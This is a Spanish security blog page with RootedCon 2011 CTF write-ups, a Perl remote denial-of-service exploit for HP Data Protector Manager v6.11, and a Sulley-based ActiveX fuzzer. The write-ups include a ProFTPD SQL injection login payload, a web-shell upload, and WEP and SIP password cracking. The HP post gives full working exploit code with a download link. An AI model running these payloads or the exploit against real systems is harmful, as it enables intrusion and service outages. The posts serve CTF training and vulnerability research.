Pepelux

blog

RootedCon CTF writeup niveles 7 y 8

abr 14

Publicado por Pepelux en Hacking, Retos hacking, Rooted2011 | No hay comentarios

Reto 7

Este reto era de ingeniería social y trataba de localizar a alguien. Ahora la prueba está deshabilitada y se pasa de forma rápida:

——————–

La prueba 7 se ha eliminado ya que es necesario estar en la rooted para completarla, es de ingeniería social… y bueno… no es necesario llamar a ese teléfono,… así que para saltarte la prueba este es el resultado de la prueba 7:

——————–

La imagen que había inicialmente era esta:

Así que ahora en lugar de ingeniería social tenemos una imagen que no sabemos si es la que han subido para el reto o es que el enlace está mal. Vamos a http://imageupload.org y cargamos cualquier número aleatorio, con lo que obtenemos la misma imagen. La descargamos y hacemos un diff con la que tenemos y vemos que son iguales. Por tanto, lo que está mal es el enlace a la foto, que supongo será parte del reto.

Bueno, tras un rato probando cosas resultó que el enlace estaba mal porque imageupload no funciona bien y esto no era parte del reto. Así que tras avisar a Pablo, subió bien la imagen, que era un código de barras:

Así que lo leemos desde Linux con el Zbarimg:

La solución para pasar el reto es: 2887188576

Reto 8

El número obtenido en el reto anterior resulta ser una dirección IP, en decimal: 172.23.0.96, que se puede obtener en esta web:

http://www.kloth.net/services/iplocate.php

Hacemos un escaneo a esa web para ver los puertos abiertos:

Nos conectamos como anónimo por FTP a ver qué hay:

El fichero proftpd-howto.conf trae lo siguiente:

La verdad es que me recuerda mucho al reto de Security by Default :)

Tenemos información del bug disponible aquí:

http://www.exploit-db.com/exploits/8037/

Consigo acceder con:

user: USER%’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser #

pas: 1

pero veo los mismos datos que antes:

Así que vamos a añadir un LIMIT 1,1 para ver si accedemos con otro usuario:

Por tanto, la clave para el siguiente reto es: I have to drink some beers


Etiquetas: , , , , ,

RootedCon CTF writeup niveles 5 y 6

abr 4

Publicado por Pepelux en Hacking, Retos hacking, Rooted2011 | 2 Comentarios

Esta vez voy a subir la solución de dos retos en lugar de uno sólo, ya que el nivel 5 es fácil fácil (el más fácil de todo el CTF) … como dijo Pablo Catalina, este venía de regalo xDD

Reto 5

Para este reto tenemos que continuar por donde dejamos el anterior, como viene siendo habitual. Así que vamos a ver lo que trae esa imagen de disco:

Tras abrir el CAP con el wireshark vemos que tiene toda la pinta de ser una captura de una red wifi con encriptación WEP:

Por tanto, vamos a lanzar el aircrack-ng a ver si sacamos la clave:

Como se puede ver, la clave es: 01:01:01:01:01:01:01:01:01:01:01:01:01

Y la contraseña para pasar el reto: 01010101010101010101010101

Reto 6

Ya que tenemos la clave WEP (que por cierto, era de lo más sencilla), vamos a obtener el paquete sin cifrar:

Esto nos genera un nuevo fichero, ya descifrado (captura1-01-dec.cap) con 75.325 paquetes, nada menos. Lo abrimos con Wireshark y vemos que hay muchísimos paquetes TCP con basura (SYN, ACK, RST) pero ningún PSH con información útil. Esto supongo que lo harían para generar algo de tráfico y hacer efectivo un ataque con Aircrack-ng y así poder sacar fácilmente la clave WEP, por lo que vamos a aplicar algunos filtros que nos limpien un poco la basura:

Filtro: tcp.flags.push==1

0 resultados

Como comentaba antes, todos los paquetes TCP están de relleno, así que vamos a quitarlos, junto con los ARP e ICMP:

Filtro: !arp && !icmp && !tcp

17.075 resultados

Siguen apareciendo demasiados paquetes, pero ahora vemos algunas cosas interesantes. Parece que hay capturas de VoIP, así que vamos a filtrar esas capturas:

Filtro: ip.src eq 172.23.0.9 || ip.dst eq 172.23.0.9

Bien, pues parece que tenemos un bonito Asterisk tras todas esas tramas de datos y, como Wireshark trae una herramienta muy buena para VoIP, vamos a usarla. Entramos en Telephony -> VoIP Calls:

Tras escuchar cada una de las conversaciones repetidas veces, me quedo con los siguientes detalles:

  1. Alguien llama a un buzón de voz para escuchar los mensajes. Tenemos los sonidos de dos pines que se introducen.
  2. Parece que dejan el número de teléfono que buscamos en un buzón de voz y no se escucha en las conversaciones de voz capturadas.

——————————

Nota: Yo me quedé aquí en este punto cuando el CTF llegó a su fin. El resto de retos los hice ya desde casa, relajado en una buena silla :)

Me quedé atascado porque no le encontré mucho sentido a lo que estaba pasando, es decir, el mensaje decía algo como: ‘… llámame al número de teléfono’ y se cortaba. Luego veremos que el resto del mensaje está en el buzón de voz. La verdad es que no entiendo cómo si alguien deja un mensaje en un buzón de voz, se captura una parte sólo de ese mensaje, pues debería o capturarse todo o no capturarse nada.

Esto me llevó a pensar que era un problema de ruido, así que me dediqué a descargar las voces, convertirlas a WAV y perder mucho tiempo con el Audacity.

——————————

Bien, pues continuando con el reto, parece ser que tenemos que acceder al buzón de voz del usuario para escuchar el número de teléfono que deja como mensaje. Para poder acceder al buzón de un usuario necesitamos 2 cosas. Los datos del usuario (incluida su contraseña) y su PIN. Vamos con ello:

Para extraer los datos del usuario usamos sipdump y sipcrack:

Tras pasar varios diccionarios obtuve las claves de ambos usuarios, que son:

Para el user 1001: 0000aa

Para el user 1002: aa0000

Nota: las claves para cada usuario son las mismas a pesar de tener diferente hash, lo cual nos indica que el MD5 usa algún salt.

Para averiguar el PIN, primero extraemos las voces. En el Wireshark vamos a Telephony -> RTP -> Show All Streams. Luego seleccionamos el paquete y damos a Analyze. Después, Save Payload y guardamos con formato AU.

Abrimos con el Audacity y recortamos la parte que nos interesa:

Una vez que hemos recortado los 2 pines que hemos encontrado, los desciframos con Multimon (click para agrandar la imagen):

El pin de pownme es: 987321

El pin de lamde es: 123654

El siguiente paso es conseguir un software para conectar con el Asterisk. Vamos a usar para ello el Twinkle, que está en el repositorio de Debian.

Si te atascas instalándolo, aquí hay un bonito tutorial:

http://openmaniak.com/trixbox_phone.php#twinkle

Nos conectamos a ambos buzones y en el de lamde escuchamos el número de teléfono que buscábamos y que es la clave para pasar al siguiente reto: 666.699.004


Etiquetas: , , , , ,

RootedCon CTF writeup nivel 4

abr 1

Publicado por Pepelux en Hacking, Retos hacking, Rooted2011 | No hay comentarios

Reto 4

Accedemos ahora a la shell de este usuario (pownme) con un su, o simplemente haciendo otra conexión por ssh:

Y vemos lo que tiene en su directorio y a lo que no teníamos acceso:

El fichero comprimido, que descargamos con un scp desde nuestra máquina, parece tener una imagen de un disco que ha sido cifrada con LUKS usando SHA256. Esto lo vemos haciendo un head del fichero o abriéndolo con un editor hexadecimal.

Según la Wikipedia (http://es.wikipedia.org/wiki/LUKS):

——————–

LUKS (de las siglas en inglés, Linux Unified Key Setup) es una especificación de cifrado de disco creado por Clemens Fruhwirth, originalmente destinado para Linux. Mientras la mayoría del software de cifrado de discos implementan diferentes e incompatibles formatos no documentados, LUKS especifica un formato estándar en disco, independiente de plataforma, para usar en varias herramientas. Esto no sólo facilita la compatibilidad y la interoperabilidad entre los diferentes programas, sino que también garantiza que todas ellas implementen gestión de contraseñas en un lugar seguro y de manera documentada.

La implementación de referencia funciona en Linux y se basa en una versión mejorada de cryptsetup, utilizando dm-crypt como la interfaz de cifrado de disco. En Microsoft Windows, los discos cifrados con LUKS pueden ser utilizados con FreeOTFE. Ha sido diseñado para ajustarse a la clave de configuración TKS1 de sistema seguro.

——————–

Pues vamos a tratar de montar esa imagen, de la que por cierto, no tenemos la contraseña ….

Yo nunca había encriptado una unidad por lo que tras documentarme en Google, al final hice:

Una vez tenemos los módulos de crypt, vamos a tratar de montar la imagen. Para ello usaremos loop, que asigna una imagen a un dispositivo, lo que nos permitirá tratarlo como una unidad.

Para ver el primer dispositivo loop libre:

Para usar el dispositivo (con esto asociamos /dev/loop0 con nuestra imagen):

Luego tratamos de montar la imagen (si fuera una imagen normal usaríamos el comando mount, pero al tratarse de un LUKS, debemos usar cryptsetup):

Parece que la imagen está dañada ya que no la reconoce como LUKS. Tras buscar información sobre el formato y compararla con nuestra imagen, vemos claramente que hay una serie de ceros en la cabecera (antes de la palabra LUKS) que no deberían estar, por lo que hacemos una copia de la imagen (por si las moscas) y modificamos esta quitando todos esos ceros:

Para probarlo, desasociamos el dispositivo y lo volvemos a asociar:

Bueno, pues parece que ya tenemos resuelto el primer problema. Ahora queda averiguar cuál es la contraseña. Para ello me creé un pequeño script en Perl:

Lo que hace este script es probar las palabras de un diccionario, parando si consigue montar la unidad. Para ello:

  1. Cargamos el diccionario.
  2. Ejecutamos con un system el cryptsetup usando un pipe y así no tener que meter la contraseña escribiéndola desde la línea de comandos.
  3. Miramos en /dev/mapper si se ha montado el dispositivo, tras lo cual paramos el script y mostramos la última contraseña que se probó, que deberá ser la buena.

Tras unos minutos corriendo con un diccionario de palabras comunes, obtenemos la contraseña, que es: key y que nos sirve para pasar al reto siguiente.

Etiquetas: , , , ,

RootedCon CTF writeup nivel 3

mar 25

Publicado por Pepelux en Hacking, Retos hacking, Rooted2011 | 1 Comentario

Reto 3

Como vimos en el reto anterior, tenemos corriendo un knockd que nos abre un ssh en el puerto 22.

Si no sabes lo que es el port knocking puedes ver cómo funciona aquí: http://es.wikipedia.org/wiki/Golpeo_de_puertos

Como resumen, diré que se trata de un mecanismo de seguridad que oculta ciertos servicios y los abre recibiendo una secuencia mágica de números.

En este caso, todos los puertos que espera knockd son TCP, por lo que para que nos de acceso, le mandaremos la secuencia mágica, para posteriormente conectarnos por ssh:

Accedemos con nuestro usuario y contraseña:

Y analizamos un poco el entorno.

En nuestro directorio no vemos nada de utilidad pero si retrocedemos un directorio, en /home/ hay un segundo usuario cuyo nombre nos incita a entrar :) … su nombre es: pownme

Así que accedemos a su carpeta personal y hacemos un ls -la para ver lo que hay dentro:

Aquí vemos varias cosas interesantes:

  • Un binario que podemos ejecutar con suid de pownme.
  • Un fichero de configuración al que no tenemos acceso.
  • Otro fichero comprimido al que tampoco tenemos acceso.

Todo apunta a que hay que hacer una escalada de privilegios para llegar a ver el contenido de ese fichero comprimido, así que vamos a ver qué hace el binario:

Bueno, pues está claro que se trata de un overflow. Llegados a este punto necesitamos obtener algo de información para ver con qué nos enfrentamos, si tenemos que crear un exploit o simplemente hay que machacar algún dato.

Sacamos algo de información del sistema:

A primera vista ya nos encontramos con varios problemas:

  • Por un lado se trata de una arquitectura de 64 bits.
  • Por otro lado, tenemos activado el randomize_va_space.
  • El binario no tiene permisos de lectura, por lo que no podemos descargarlo a nuestra máquina y usar luego el EDB, IDA Pro o nuestro debugger favorito.
  • No hay ningún depurador instalado en la máquina, por lo que tampoco podemos depurar ahí.

Llegados a este punto sólo nos queda probar a mano:

Tras realizar varias pruebas al final vemos algo interesante introduciendo el usuario seguido de diferentes \x01:

Vemos que ya no da error de permisos pero tampoco saca los datos completos. Así que vamos a probar con \x02:

Y ya, por curiosidad, si ponemos un \x03:

Pues parece hemos sobrescrito en número de líneas a imprimir, a parte de otra cosa, que nos permite ver los datos de otro usuario.

Introducimos el usuario y la contraseña obtenida para pasar el reto: pownme:c@r@m3l0_0.o

———————————————————————————-

Nota: La verdad es que no comprendí muy bien cómo pasé el reto ya que fui probando bytes hasta que ‘de casualidad’ me apareció la contraseña por pantalla.

Ya, por mera curiosidad y, en casita, me descargué el binario (ahora que ya tenemos la contraseña de pownme, es fácil :) y lo abrí con IDA Pro para analizarlo un poco).

Abrimos el binario con el IDA Pro para 64 bits y echamos un ojo al contenido.

>>>> Antes de nada, si meto la pata no me fustiguéis, que los binarios de 64 bits en Linux no son precisamente mi fuerte :P <<<<

Bien, pues de momento nos encontramos una función llamada get_value(), que tras entrar en ella podemos ver:

En la cabecera de la función vemos la inicialización de los parámetros usados, que por comodidad he renombrado:

  • nombreDeUsuario es el parámetro de entrada, donde escribimos el nombre de usuario.
  • bufferValidacion (igual el nombre que le he puesto resulta lioso) es, digamos, el umbral a partir del cual te dice si eres un Bad Boy.
  • UIDUsuario es donde se guarda el resultado de la llamada a _getuid.

Un poco más abajo vemos cómo, tras el _getuid, guarda un 0 si no tenemos permisos o un 1 si los tenemos, es decir, por defecto, con el usuario lamde, nos dejaría un 0 y no podríamos ver los datos de pownme:

Y más abajo aún tenemos la verificación de lo que he llamado bufferValidacion, que tendría el valor con el que sobrescribimos pasados los 12 bytes primeros. Y en caso de ser menor de 3, nos aparece el mensaje de ‘Bad Kid’:

Por último, tenemos la verificación de lo que almacenamos anteriormente en UIDUsuario, que como vimos, era un 0 si no tenemos acceso, y un 1 si lo tenemos:

Como podemos apreciar, si vale 0 nos manda al mensaje de ‘You can’t touch this!’ y, en caso contrario, nos mostrará los datos del usuario.

En resumen, nuestra finalidad es cambiar el valor de UIDUsuario para que nos deje mostrar los datos de pownme, pero saltándonos el filtro de bufferValidacion que nos lleva por otro camino para mostrarnos la frase Bad Kid.

Por tanto, una forma de pasarlo directamente sería introduciendo (clickea en la imagen para ampliar):

donde \x70\x6f\x77\x6e\x6d\x65 es pownme.

———————————————————————————-

Etiquetas: , , , ,

RootedCon CTF writeup niveles 1 y 2

mar 19

Publicado por Pepelux en Hacking, Retos hacking, Rooted2011 | 4 Comentarios

A petición de Pablo Catalina (@xkill), voy a ir poniendo la solución del CTF por partes. Ahora voy a publicar la solución de los niveles 1 y 2 (en este último es donde más gente ha quedado atascada), y cada semana publicaré un nuevo nivel.

Ahí vamos … :)

Reto 1

Al validarse en el reto, a cada participante le aparecía una URL de acceso diferente, ya que cada uno debíamos atacar a una máquina virtual distinta. En mi caso, la URL era http://172.23.23.24 y tras acceder por web, únicamente aparecía la siguiente imagen:


Mirando el código fuente de la página, nada más que se ve esto:

De manera que todo apunta a una prueba de esteganografía.

Lo primero que hice fue bajarme la imagen y hacer un strings para ver si salía algo de texto, luego la analicé con un editor hexadecimal (concretamente con el gHex2) por si aparecía algo extraño. También miré, sin éxito, con el 010 Editor, que trae muchos templates para analizar diferentes formatos de ficheros.

Como no sacaba nada en claro, el siguiente paso fue abrirla con el Gimp y empezar a cambiar tonos, brillos, etc, etc, etc. Tampoco hubo suerte.

Como último recurso, me puse a probar, a voleo, diferentes programas de esteganografía (steghide, xdeview, snowdrop, enscribe, openstego, etc) hasta que di con uno (el outguess) que, al fin, sacó los datos ocultos:

La respuesta para pasar el reto es: Lamde:JodNes=


Reto 2

Al pasar el primer reto se obtiene un usuario y una contraseña, pero nada más. Ningún acceso a una nueva web donde validar esos datos ni nada, así que no queda otra que hacer un escaneo a ver si encontramos algo:

Para ello usé DirBuster: http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Tras unos minutos de escaneo encontró el directorio: /backstage con algunos subdirectorios. Tras acceder a él se puede ver el acceso a lo que parece un file manager:

Lo primero que trato de hacer es lo más lógico, dado que en el reto anterior obtuve un usuario y una contraseña, traté de usarlos para entrar, pero me decía que los datos eran incorrectos.

Este reto me llevó casi un día resolverlo. La verdad es que fue una verdadera agonía.

Analizando el código, vi que se trataba de la última versión de PHPFileNavigator v2.3.3 (http://pfn.sourceforge.net/) así que lo primero fue buscar alguna vulnerabilidad conocida en securityfocus, exploit-db, etc, sin éxito. El segundo paso fue descargar los fuentes y analizarlos para ver un poco cómo estaba programado y buscar algún posible bug.

Bajé los fuentes y le eché un ojo a los 3 posibles formularios de entrada:

- El de validación de usuario: index.php

- El de recuperación de contraseña: contrasinal.php

- El de activación de nueva contraseña: activar_contrasinal.php

Todos ellos filtraban bien todos los valores que se obtenían.

Echando un ojo a los PHP que se incluían tampoco encontré forma de inyectar nada ya que en todos tenía un control de sesiones. Así que volví a cargar estos 3 formularios en la web para jugar un poco con ellos.

Me llamó la atención el de recuperación de contraseña, ya que nos avisa si el usuario que introducimos es correcto o no:

Usuario: admin

Correo electrónico: x@x.com

No existe ningún usuario con esos datos, por favor comprueba que el usuario y el correo son correctos.

Usuario: Lamde

Correo electrónico: x@x.com

Este usuario no tiene permisos para cambiar su contraseña, por favor contacta con el administrador.

Usuario: lamde

Correo electrónico: x@x.com

Este usuario no tiene permisos para cambiar su contraseña, por favor contacta con el administrador.

(Nota: Esto es un fallo del reto. Luego explicaré por qué)

Tras perder bastante tiempo con los 3 formularios y, ya bastante desesperado, le pasé un par de fuzzers que tengo programados para buscar fallos de SQLi, ICH, RCE, LFI, RFI por si se me escapaba algo, pero tampoco encontró nada.

Como dije antes, perdí casi un día con este reto y no encontré ninguna vulnerabilidad nueva.

Al final, resultó que el usuario era todo en minúsculas y la contraseña tal cual nos salió en el reto anterior: lamde / JodNes=

(Nota: dije antes que era un fallo del reto porque en ambos casos (con Lamde y con lamde), en la pantalla de recuperación de contraseña, nos dice que el usuario no tiene permisos, cuando en el primer caso debería decir que no existe el usuario, tal y como ocurrió cuando probé con admin (y con otros tantos). Esto fue el motivo por el que perdí tanto tiempo y por el que se quedaron atascados muchos de los participantes.)

Una vez que conseguí acceso al dichoso file manager, se podían ver un montón de ficheros PDF, que supongo estarían para despistar, porque cuando se accede a una web de este tipo, al primer lugar a donde se te van los ojos es a los permisos de escritura. En este caso sí que teníamos permisos, por lo que subí un phpinfo (por mera curiosidad) y una shell.

Como para resolver la prueba pedía: ‘numero, numero, numero, …’, me imaginé que se trataba de un knock, así que tras verificar que el demonio knockd estaba corriendo, el siguiente paso era ver los puertos usados:

Editando con un cat el fichero de configuración /etc/knockd.conf vemos:


Los puertos de desbloqueo y la contraseña para pasar este segundo reto es:

7000,8000,9000,2323,23,65000

Etiquetas: , , ,

HP Data Protector Manager v6.11 (DoS en el servicio RDS)

ene 8

Publicado por Pepelux en Exploits, Hacking | 2 Comentarios

Continuamos con la saga de servicios de HP Data Protector Manager v6.11, en el que ya subí a mi web dos denegaciones de servicios en OmniInet y MMD (que por cierto, está la misma vulnerabilidad también en el servicio KMS, que usa la mismoa DLL) …  y todas ellas debido a un fallo en la DLL MSVCR71.dll que provocaba un NULL Pointer Dereference.

Esta vez se trata del servicio RDS y la DLL afectada es otra diferente, así como la causa de la denegación de servicio.

Antes de nada, decir que cuando estuve mirando este programa de HP, hace unos meses, mi amigo Roi Mallo lo hizo también, y cada uno miramos servicios diferentes. El DoS en el RDS lo descubrió él en su día, pero no lo llegó a publicar ya que tuvo un desafortunado incidente con su disco duro :)

Como me puse el otro día de nuevo a revisar este software, me comentó su hallazgo así que me he limitado a verificarlo.

Ya que no dispongo de un cliente para ese servicio, tras hacer un poco de reversing y un simple breakpoint en recv he podido ver que los datos esperados son:

1 Dword // siempre B6298C23 (\x23\x8c\x29\xb6)

1 Dword // que indica el tamaño de los datos

Datos

Y lo que hace, básicamente es:

  • La DLL _ncp32.dll es la responsable de realizar el RECV en espera de los datos del cliente.
  • Analiza la cabecera y, si es correcta, llama a _rm32.dll pasando el tamaño.
  • _rm32.dll realiza un MALLOC para reservar memoria para el paquete y devuelve la dirección donde deben guardarse los datos.
  • Si el tamaño es muy grande, MALLOC devuelve 0 y se realiza un EXIT controlado, con lo que el servicio queda parado.
// _ncp32.dll
00482F92   68 7DFAF908      PUSH 8F9FA7D
00482F97   6A 00                PUSH 0
00482F99   6A 01                PUSH 1
00482F9B   6A 00                PUSH 0
00482F9D   8B55 F8              MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
00482FA0   52                       PUSH EDX
00482FA1   E8 9C2D0000    CALL <JMP.&_rm32.#20_rm_getMem>

// _rm32.dll
0038C49B   8B45 08              MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
0038C49E   83C0 08              ADD EAX,8
0038C4A1   50                   PUSH EAX
0038C4A2   FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>]    ; MSVCR71.malloc  -> Returns 0 because no space available
......
0038C5F9   50                       PUSH EAX
0038C5FA   68 2C0C3A00      PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
.....
0038C64E   E8 8D220000      CALL _rm32.rm_errorExit

Y el exploit:

#!/usr/bin/perl

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
#
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
#                   http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
#              Pepelux - pepelux[AT]enye-sec[DOT]com
#                   http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
#
# Vulnerable file: Program Files\OmniBack\rds.exe
#
# Tested on Windows XP SP2 && Windows XP SP3
#
#
# POC:
# _ncp32.dll is the responsable of waiting the packet (RECV)
# when a packet is received, it uses _rm32.dll to allocating memory,
# as the size is too big, malloc can't allocate this size and the program exit.
#
# _ncp32.dll
# 00482F92   68 7DFAF908      PUSH 8F9FA7D
# 00482F97   6A 00                PUSH 0
# 00482F99   6A 01                PUSH 1
# 00482F9B   6A 00                PUSH 0
# 00482F9D   8B55 F8              MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0   52                       PUSH EDX
# 00482FA1   E8 9C2D0000    CALL <JMP.&_rm32.#20_rm_getMem>
#
#
# _rm32.dll
# 0038C49B   8B45 08              MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
# 0038C49E   83C0 08              ADD EAX,8
# 0038C4A1   50                   PUSH EAX
# 0038C4A2   FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>]    ; MSVCR71.malloc  --> Returns 0 because no space available
# ......
# 0038C5F9   50                       PUSH EAX
# 0038C5FA   68 2C0C3A00      PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
#......
# 0038C64E   E8 8D220000      CALL _rm32.rm_errorExit

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
 print "Usage: perl $0 <host> [port]\n";
 print "\tdefault port = 1530\n\n";
 exit 1;
}

$port = 1530 if !($ARGV[1]);

if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x23\x8c\x29\xb6";     # header (always the same)
$buf .= "\x64\x00\x00\x00";         # data packet size (too big)
$buf .= "\x41"x4;                        # data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";
exit;

Podéis bajar el exploit aquí: http://pepelux.org/exploits/hpdataprotector_rds.pl

Etiquetas: ,

Fuzzeando con Sulley algunos activex

dic 24

Publicado por Pepelux en Exploits, Fuzzing | 1 Comentario

En el anterior post puse un código en python para fuzzear activex con Sulley. Bien, pues como comenté, el código estaba casi sin probar y necesitaba algunos retoques. He cambiado algunas cosas y he probado un par de exploits que aparece en exploit-db y los resultados han sido muy buenos.

Vamos a ver algunas capturas:

Ecava IntegraXor Remote ActiveX Buffer Overflow PoC (http://www.exploit-db.com/exploits/15767/)

WMITools ActiveX Remote Command Execution Exploit 0day (http://www.exploit-db.com/exploits/15809/)

¡¡¡ Felices Fiestas a todos !!!

Etiquetas: , ,

Fuzzeando activex con Sulley

dic 22

Publicado por Pepelux en Exploits, Fuzzing | 1 Comentario

Hace poco escribí acerca de como hacer un script para fuzzear aplicaciones locales con Sulley. Aprovechando esta base, he creado, junto con mi amigo Roi, otro script orientado a fuzzear activex. Está sin probar bien por lo que posiblemente requiera de algunos retoques, pero puede servir como base.

Las diferentes opciones son:

  • -l -> lista todos los activex instalados en Windows.
  • -n -> tiene en cuenta los que hay en exclude.txt y muestra los que no están ahí. Esta opción es bueno para tener ahí metidos todos los que aparezcan en tu máquina virtual y luego, localizar rápidamente los que instales.
  • -s NAME -> busca por aproximación el nombre de un componente.
  • -d ID -> igual que antes pero con el CSLID, es decir, busca por aproximación el ID del activex.
  • -m FILE -> aquí pasamos la ruta del activex y nos mostrará todos los métodos y parámetros que acepta.
  • -f FILE -> de forma similar al comando anterior, abre el activex e intenta fuzzear cada parámetro, con ayuda del potencial de Sulley.

El funcionamiento para fuzzear sería:

  1. Abre el activex.
  2. Enumera cada clase.
  3. Dentro de cada clase coge todos los métodos.
  4. Por cada método mira el número de parámetros que tiene y realiza todas las combinaciones de mutación.
  5. Luego continúa con el siguiente parámetro.
  6. Luego el siguiente método.
  7. Y el mismo proceso con la siguiente clase.

Por cada prueba se genera un fichero diferente. Y cuando lleva 100 ficheros generados, lanza el Internet Explorer para comenzar las pruebas.

Los ficheros generados son del tipo:

// file: c:/sulley/test0.html

<META HTTP-EQUIV='Refresh' CONTENT='3; URL=file:///c:/sulley/test1.html'>
<html>
<body>
<object classid='clsid:GUID id='target' />
<script language='vbscript'>
target "XXXXXXX"
</script>
</body>
</html>

De manera que tras lanzar el primer test, se va recargando el sólo con el siguiente y así evitamos tener que abrir y cerrar el Internet Explorer en cada prueba. Por defecto he puesto 3 segundos pero se puede cambiar en el script.

El fichero de sesiones sería el siguiente:

# script to fuzz ActiveX
#
# by:
# Pepelux <pepeluxx@gmail.com> - http://www.pepelux.org/ && http://www.enye-sec.org/

import win32api,win32con,pythoncom,sys,os,win32com.client
from win32com.axscript import axscript
import optparse
from sulley import *
from requests import activex_generic    # library to fuzz
from pydbg import *
from pydbg.defines import *
import os
import threading
import sys
from time import sleep

tmpfolder=r"c:\sulley\tmp"
iexplorepath=r"c:\Archivos de programa\Internet Explorer\iexplore.exe"
refreshTime=3

################################
### ACCESS VIOLATION HANDLE ####
################################

def av_handler(dbg):
 print "[x] Access Violation Handler"

 print dbg.dump_context()

 try:
 mod = dbg.addr_to_dll(dbg.context.Eip)
 print 'Eip module path : ', mod.path
 print 'Eip module base : 0x%08x'%mod.base
 print 'Eip offset : 0x%08x '%(dbg.context.Eip - mod.base)
 except:
 print 'Unable resolve Eip module'

 global stop
 stop=1

 dbg.stack_unwind()

 for i in dbg.disasm_around(dbg.context.Eip, 12):
 print "%x %s"%i

 dbg.terminate_process()

 return DBG_CONTINUE

##################################
### START PROCESS USING PYDBG ####
##################################

class start_proc (threading.Thread):
 def __init__(self, t_proc_name, t_name):
 threading.Thread.__init__(self)
 self.t_proc_name = t_proc_name
 self.t_name = t_name

 def run(self):
 dbg = pydbg()
 dbg.load(self.t_proc_name, self.t_name)
 dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, av_handler)
 dbg.run()

#############################################
### GET COMPONENTS FROM WINDOWS REGISTRY ####
#############################################

def getCLSID( type, name ):
 index=0
 count=0
 clsid_list=[]

 #getting registry keys
 try:
 cKey=win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes")
 except win32api.error:
 print"[x] Error opening registry keys."
 sys.exit(0)

 #getting subkeys
 while True:
 try:
 sKey=win32api.RegEnumKey(cKey,index)
 except win32api.error:
 break
 progid=sKey

 #getting CLSID registry keys
 try:
 sKey=win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\%s\\CLSID" % progid)
 except win32api.error:
 index+=1
 continue

 #getting CLSID values
 try:
 clsid=win32api.RegQueryValueEx(sKey,None)[0]
 except win32api.error:
 print"[x] Error getting CLSID value."
 index+=1
 continue

 clsid_list.append((progid,clsid))
 index+=1

 if name == "new":
 wlist=[]

 try:
 file = open("exclude.txt")

 while 1:
 line=file.readline()
 wlist.append(line)

 if not line:
 break
 pass

 file.close()
 except:
 print "[x] File 'exclude.txt' not found"
 sys.exit(0)

 lastComName=""
 lastComNameIni=""
 lastComId=""

 for clsid in clsid_list:
 comName=clsid[0]
 comNameIni=clsid[0][0:clsid[0].find(".")]
 comId=clsid[1]
 show=1

 if name == "new":
 for value in wlist:
 if comNameIni.replace("\n","") == value.replace("\n",""):
 show=0

 if show == 1:
 if comName != lastComName and comId != lastComId:
 if lastComNameIni != comNameIni:
 print "\n"

 try:
 if type == "name":
 if name == "all" or name == "new" or comName.lower() == name.lower() or comName.lower().index(name.lower())>-1:
 print"[+] "+comName + " - " + comId
 else:
 if name == "all" or name == "new" or comId.lower() == name.lower() or comId.lower().index(name.lower())>-1:
 print"[+] "+comName + " - " + comId

 count+=1
 except:
 continue

 lastComName=comName
 lastComNameIni=comNameIni
 lastComId=comId

 if count == 0:
 print "[x] No entries found\n"

 sys.exit(0)

####################################
### GET METHODS FROM A DLL FILE ####
####################################

def getTypes( activex ):
 VTS={}

 try:
 tlb=pythoncom.LoadTypeLib(activex)
 except:
 print"[x] Error loading library."
 sys.exit(0)

 name=tlb.GetDocumentation(-1)[0]
 print "[+] Name: "+name

 clsid=str(tlb.GetLibAttr()[0])
 print "[+] CLSID: "+clsid+"\n"

 for vt in [x for x in pythoncom.__dict__.keys() if x.count("VT_")]:
 VTS[eval("pythoncom.%s" % vt)]=vt

 for i in xrange(tlb.GetTypeInfoCount()):
 name=tlb.GetDocumentation(i)[0]
 print "  [-] Interface: "+name
 info=tlb.GetTypeInfo(i)
 attr=info.GetTypeAttr()
 print "  [-] GUID: "+str(attr.iid)

 print"     [%d] Properties:" % i

 try:
 for j in xrange(attr.cVars):
 id=info.GetVArDesc(j)[0]
 names=info.GetNames(id)
 print"[%d/%d]\t%s" % (i,j,names[0])
 except:
 continue

 lastMethodName=""

 print"\t+ Methods:"

 for k in xrange(attr.cFuncs):
 desc=info.GetFuncDesc(k)

 if desc.wFuncFlags:
 continue

 id=desc.memid
 names=info.GetNames(id)
 methodName = names[0]

 if methodName != lastMethodName:
 print"\t\t%s" % (methodName)
 k=0

 lastMethodName=methodName

 try:
 for name in names[1:]:
 print"\t\t\t%s,%s" % (name, VTS[desc.args[k][0]])
 k+=1
 except:
 continue

 print"\n"
 sys.exit(0)

###########################
### FUZZING A DLL FILE ####
###########################

def startFuzz( activex ):
 VTS={}

 try:
 tlb=pythoncom.LoadTypeLib(activex)
 except:
 print"[x] Error loading library."
 sys.exit(0)

 if not os.path.isdir(tmpfolder):
 os.mkdir(tmpfolder)

 for file in os.listdir(tmpfolder):
 file_path = os.path.join(tmpfolder, file)

 try:
 if os.path.isfile(file_path):
 os.unlink(file_path)
 except:
 break

